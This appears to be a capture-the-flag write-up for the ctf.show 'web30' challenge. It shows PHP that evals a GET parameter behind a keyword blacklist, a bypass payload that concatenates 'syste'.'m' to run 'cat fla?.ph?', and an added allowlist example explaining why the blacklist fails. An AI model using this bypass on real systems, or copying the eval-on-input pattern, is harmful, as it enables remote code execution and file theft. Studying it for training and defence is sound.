web30

Code audit

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 00:42:26
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/

error_reporting(0);

if(isset($_GET['c'])){
    $c = $_GET['c'];
    // Case-insensitive keyword blacklist: reject input containing flag, system or php
    if(!preg_match("/flag|system|php/i", $c)){
        // Anything that passes the blacklist is executed as PHP code
        eval($c);
    }
}else{
    // No parameter given: show this source file
    highlight_file(__FILE__);
}

`system` is filtered, but it is still easy.

Just use PHP's dynamic (variable) functions.

payload:

http://48c7fde3-1b06-422b-915d-25a32125fb8c.challenge.ctf.show/?c=$s="syste"."m";$s("cat fla?.ph?");
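As an added illustration (not part of the original writeup), the following PHP puts the challenge's blacklist next to a safer pattern: the regex only inspects literal substrings, so a function name assembled at runtime never matches it, whereas a dispatcher that never evaluates user input and only accepts a fixed set of action names has nothing to bypass. The function names and the action map are my own assumptions.

```php
<?php
// Added example: the challenge's keyword blacklist beside an allowlist dispatcher.

// The challenge filter, unchanged: a case-insensitive substring blacklist.
// It sees only the literal request text, so "syste"."m" (concatenated at
// runtime) and the glob fla?.ph? contain none of the banned keywords.
function blacklistAllows(string $c): bool
{
    return !preg_match("/flag|system|php/i", $c);
}

// Safer alternative (assumed design, not from the challenge): the request
// selects an action by name from a fixed map, and no user-controlled string
// is ever passed to eval() or to a shell.
const ALLOWED_ACTIONS = [
    'time'    => 'actionTime',
    'version' => 'actionVersion',
];

function actionTime(): string
{
    return date('c');
}

function actionVersion(): string
{
    return PHP_VERSION;
}

function dispatch(string $name): string
{
    // Reject anything that is not an exact key of the allowlist.
    if (!array_key_exists($name, ALLOWED_ACTIONS)) {
        return 'unknown action';
    }
    $fn = ALLOWED_ACTIONS[$name];
    return $fn();
}

// The payload quoted in the writeup above, used here only as a test input.
$payload = '$s="syste"."m";$s("cat fla?.ph?");';

// Blacklist: the payload contains no banned keyword, so the check lets it through.
var_dump(blacklistAllows($payload));

// Allowlist: the same string is not an action name, so it is rejected;
// only exact keys such as 'version' are dispatched.
echo dispatch($payload), "\n";
echo dispatch('version'), "\n";
```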